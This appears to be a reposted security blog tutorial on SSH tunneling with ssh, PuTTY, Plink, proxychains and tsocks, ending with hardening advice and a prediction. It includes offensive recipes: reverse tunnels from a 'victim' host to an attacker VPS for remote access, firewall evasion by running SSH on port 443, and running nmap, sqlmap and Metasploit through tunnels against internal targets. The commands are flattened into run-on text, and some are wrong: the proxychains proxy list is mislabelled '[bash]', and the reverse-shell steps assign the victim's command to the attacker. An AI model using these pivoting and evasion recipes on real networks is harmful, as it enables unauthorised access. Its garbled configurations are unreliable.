Listen to this Post

Introduction:
SSH tunneling (or SSH port forwarding) creates an encrypted tunnel between a client and a server, allowing you to securely route network traffic, access internal services, and evade firewall restrictions. This technique is a cornerstone of ethical hacking, penetration testing, and secure remote administration, transforming a simple SSH connection into a versatile tool for both offensive and defensive cybersecurity operations.
Learning Objectives:
- Implement dynamic, local, and remote SSH tunneling using Linux and Windows tools.
- Configure PuTTY, SOCKS5 proxies, and tsocks/proxychains to route applications through encrypted tunnels.
- Bypass firewall restrictions and harden SSH tunnel configurations for red team engagements.
You Should Know:
- Dynamic SSH Tunneling – Creating a SOCKS5 Proxy on the Fly
Dynamic tunneling turns your SSH client into a SOCKS5 proxy server, allowing any application configured to use that proxy to route traffic through the encrypted SSH connection. This is ideal for web browsing, scanning, or using tools like Nmap through a remote network.
Step‑by‑step guide (Linux/macOS):
Create a dynamic SOCKS5 tunnel on local port 1080 ssh -D 1080 [email protected] Verify the tunnel is listening netstat -tuln | grep 1080
Configure Firefox to use the proxy:
- Go to Settings → Network Settings → Manual proxy configuration.
- SOCKS Host: 127.0.0.1, Port: 1080, select SOCKS v5.
- Set `proxy.socks_remote_dns` to `true` in `about:config` to resolve DNS through the tunnel.
Using tsocks or proxychains (Linux):
Install proxychains sudo apt install proxychains4 Edit /etc/proxychains4.conf – add at the end: socks5 127.0.0.1 1080 Run any tool through the tunnel proxychains4 nmap -sT -Pn 192.168.1.0/24 proxychains4 curl http://internal-website.local
Windows with PuTTY:
- Open PuTTY, enter remote server IP/port.
- Go to Connection → SSH → Tunnels.
- Source port:
1080, selectDynamic, clickAdd. - Open connection. The SOCKS5 proxy is now available at
127.0.0.1:1080.
- Local SSH Tunneling – Forwarding Remote Ports to Your Local Machine
Local tunneling forwards a port from the remote server (or a server reachable via the SSH server) to your local machine. Use this to access internal databases, web dashboards, or RDP services that are not directly exposed.
Step‑by‑step guide:
Syntax: ssh -L local_port:target_host:target_port user@ssh_server Example: Access a remote internal web server (192.168.1.100:80) via local port 8080 ssh -L 8080:192.168.1.100:80 [email protected] Multiple local forwards can be chained: ssh -L 8080:internal-web:80 -L 3306:db.internal:3306 [email protected]
Verification:
On your local machine, open a browser to http://localhost:8080 Or test with curl: curl http://localhost:8080 For RDP (Windows Remote Desktop) forwarding: ssh -L 3389:target-pc:3389 [email protected] Then connect to localhost:3389 using mstsc.exe
Windows (PowerShell/CMD using built-in OpenSSH):
ssh -L 8443:intranet.corp.local:443 [email protected]
- Remote SSH Tunneling – Exposing Local Services to a Remote Server
Remote tunneling does the opposite: it forwards a port from your local machine to the remote SSH server, allowing others (or the remote server itself) to access a service running on your local network. This is a common technique for reverse shells, sharing a local development server, or bypassing NAT.
Step‑by‑step guide:
Syntax: ssh -R remote_port:local_host:local_port user@ssh_server Example: Expose local web server (localhost:3000) on remote server's port 8080 ssh -R 8080:localhost:3000 [email protected] To allow other hosts on the remote network to connect, edit /etc/ssh/sshd_config on the server: GatewayPorts yes Then restart SSH: sudo systemctl restart sshd Now remote users can connect to remote-server.com:8080 to reach your local app
Use case – reverse shell with remote tunneling:
On attacker's machine (publicly accessible): ssh -R 2222:localhost:22 [email protected] On attacker VPS, connect back to the victim's SSH: ssh -p 2222 victim-user@localhost
Windows PuTTY remote tunnel:
- Connection → SSH → Tunnels.
- Source port:
8080, Destination:localhost:3000, selectRemote, clickAdd.
- Configuring PuTTY for SSH Tunneling on Windows (Complete Walkthrough)
PuTTY is the de facto SSH client on Windows, offering a graphical interface for all tunneling types.
Step‑by‑step:
- Download PuTTY from putty.org (no installation required).
- Launch
putty.exe. Under Session, enter your remote server’s IP/hostname and port (default 22).
3. Navigate to Connection → SSH → Tunnels.
- Dynamic: Enter source port (e.g., 1080), select
Dynamic, clickAdd. You’ll see `D1080` in the forwarded ports list. - Local: Enter source port (e.g., 8888), destination (e.g.,
internal-server:80), selectLocal, clickAdd. SeeL8888 internal-server:80. - Remote: Enter source port (e.g., 8080), destination (e.g.,
localhost:3000), selectRemote, clickAdd. SeeR8080 localhost:3000.
- Go back to Session, save the configuration (e.g., “Tunnel to Corp”), and click
Open. - Authenticate with username/password or SSH key. The tunnel is active for the session duration.
Persistent tunneling with Plink (command-line PuTTY):
plink.exe -D 1080 -N [email protected] plink.exe -L 8443:internal-web:443 -N [email protected]
- Routing Any Application Through SSH Using proxychains and tsocks
Many penetration testing tools (Nmap, Metasploit, sqlmap) don’t natively support SOCKS proxies. Proxychains forces any TCP application through a proxy chain.
Step‑by‑step configuration (Kali Linux):
Install proxychains4 sudo apt update && sudo apt install proxychains4 -y Edit configuration sudo nano /etc/proxychains4.conf
Key settings in `proxychains4.conf`:
Uncomment 'dynamic_chain' or 'strict_chain' (dynamic_chain is more fault-tolerant) dynamic_chain Comment out 'proxy_dns' if scanning internal IPs to avoid DNS leaks proxy_dns Add your SOCKS5 proxy at the end of the [bash] section [bash] socks5 127.0.0.1 1080
Usage examples:
Run Nmap TCP scan through the SSH tunnel proxychains4 nmap -sT -Pn -p 80,443 10.0.0.0/24 Launch Metasploit console proxychains4 msfconsole Use curl to access internal API proxychains4 curl -I http://internal-api.company.local SQLmap with proxychains proxychains4 sqlmap -u "http://internal-target/login.php" --data="user=1&pass=1"
Tsocks (older but lighter):
sudo apt install tsocks sudo nano /etc/tsocks.conf Add: server = 127.0.0.1 server_port = 1080 server_type = 5 tsocks nmap -sT 192.168.1.0/24
6. Bypassing Firewalls and IDS/IPS with SSH Tunneling
Firewalls often block non‑standard ports, but SSH (port 22/tcp) is frequently allowed. You can also run SSH on port 443/tcp to mimic HTTPS traffic.
Step‑by‑step evasion techniques:
Run SSH server on port 443 (requires root) sudo systemctl stop sshd sudo nano /etc/ssh/sshd_config Change Port 22 to Port 443 sudo systemctl start sshd Connect using non-standard port ssh -p 443 [email protected] Obfuscate SSH traffic with 'obfsproxy' or 'stunnel' (not covered in depth here)
Use SSH as a simple VPN (Layer 3 tunneling with ssh -w):
On server (requires root and tunnel interface) ip link set tun5 up ssh -w 5:5 user@client-ip Then assign IP addresses to tun5 on both ends
Bypass a restrictive outbound firewall using reverse remote tunneling:
From inside the restricted network (victim) to your external VPS ssh -R 2222:localhost:22 -R 8080:localhost:80 [email protected] On the VPS, access the internal web server at localhost:8080 Or SSH back into the victim machine via localhost:2222
7. Security Hardening for SSH Tunnels in Production
When deploying SSH tunnels for red team operations or legitimate remote access, misconfigurations can expose internal networks. Follow these hardening steps.
Step‑by‑step hardening (on the SSH server – `/etc/ssh/sshd_config`):
Disable root login PermitRootLogin no Use key-based authentication only PasswordAuthentication no PubkeyAuthentication yes Restrict users who can tunnel AllowUsers [email protected]. [email protected] Limit port forwarding capabilities Allow only local forwarding (disable remote and dynamic if not needed) AllowTcpForwarding local To disable all forwarding: AllowTcpForwarding no Use a dedicated tunnel-only user with no shell sudo useradd -m -s /bin/false tunneluser sudo mkdir /home/tunneluser/.ssh sudo chmod 700 /home/tunneluser/.ssh Add public key to authorized_keys
Client‑side best practices:
Use compression to improve performance over slow links ssh -C -D 1080 user@remote Keep connection alive to prevent idle disconnects ssh -o ServerAliveInterval=60 -D 1080 user@remote Run tunnel in background with -N (no remote command) and -f (background) ssh -fN -D 1080 user@remote
Monitoring tunnel usage:
On server, list active SSH connections and forwarded ports sudo ss -tulpn | grep ssh sudo lsof -i -n | grep ssh Log all forwarded connections (add to sshd_config) LogLevel VERBOSE Then check /var/log/auth.log or /var/log/secure
What Undercode Say:
- Key Takeaway 1: SSH tunneling is not just for sysadmins – it’s a core red team skill for pivoting, data exfiltration, and bypassing network segmentation. Dynamic tunneling with SOCKS5 and proxychains turns any Linux box into a stealthy proxy.
- Key Takeaway 2: Misconfigured SSH servers are a goldmine for attackers. Always restrict forwarding to specific users, disable unused tunnel types, and monitor active connections. On the offensive side, remote tunneling (
-R) is often more powerful than local forwarding for evading egress filters.
Analysis: The post from Shikha Yadav on LinkedIn highlights a critical gap in many cybersecurity training programs: hands-on SSH tunneling. While most penetration testers know ssh -L, few master dynamic and remote tunneling in real-world scenarios. Combining PuTTY on Windows with tsocks/proxychains on Kali creates a cross-platform arsenal. The most overlooked technique is using SSH as a lightweight VPN (-w), which can replace expensive commercial solutions for lab environments. However, defenders must audit `AllowTcpForwarding` settings – a single `GatewayPorts yes` can turn an internal server into an open proxy. As zero‑trust networks rise, SSH tunneling remains a double‑edged sword: essential for secure remote work, yet a preferred vector for attackers to blend in with legitimate traffic.
Prediction:
Within the next 18 months, AI‑powered network detection systems will begin flagging anomalous SSH tunneling patterns – such as long‑lived connections with high data volume or non‑interactive sessions. Red teams will respond by adopting short‑lived, jittered tunnels and combining SSH with protocol obfuscation (e.g., using SSH over WebSocket or HTTPS). Meanwhile, cloud providers (AWS, Azure) will introduce native “SSH proxy” services with built‑in logging and rate limiting, reducing the need for manual tunnel configurations. For blue teams, expect automated tools that parse SSH `VERBOSE` logs to reconstruct forwarded connections in real time, making covert pivoting significantly harder. The arms race between stealthy SSH tunneling and advanced detection is just beginning.
▶️ Related Video (80% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Shikhhayadav Comprehensive – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


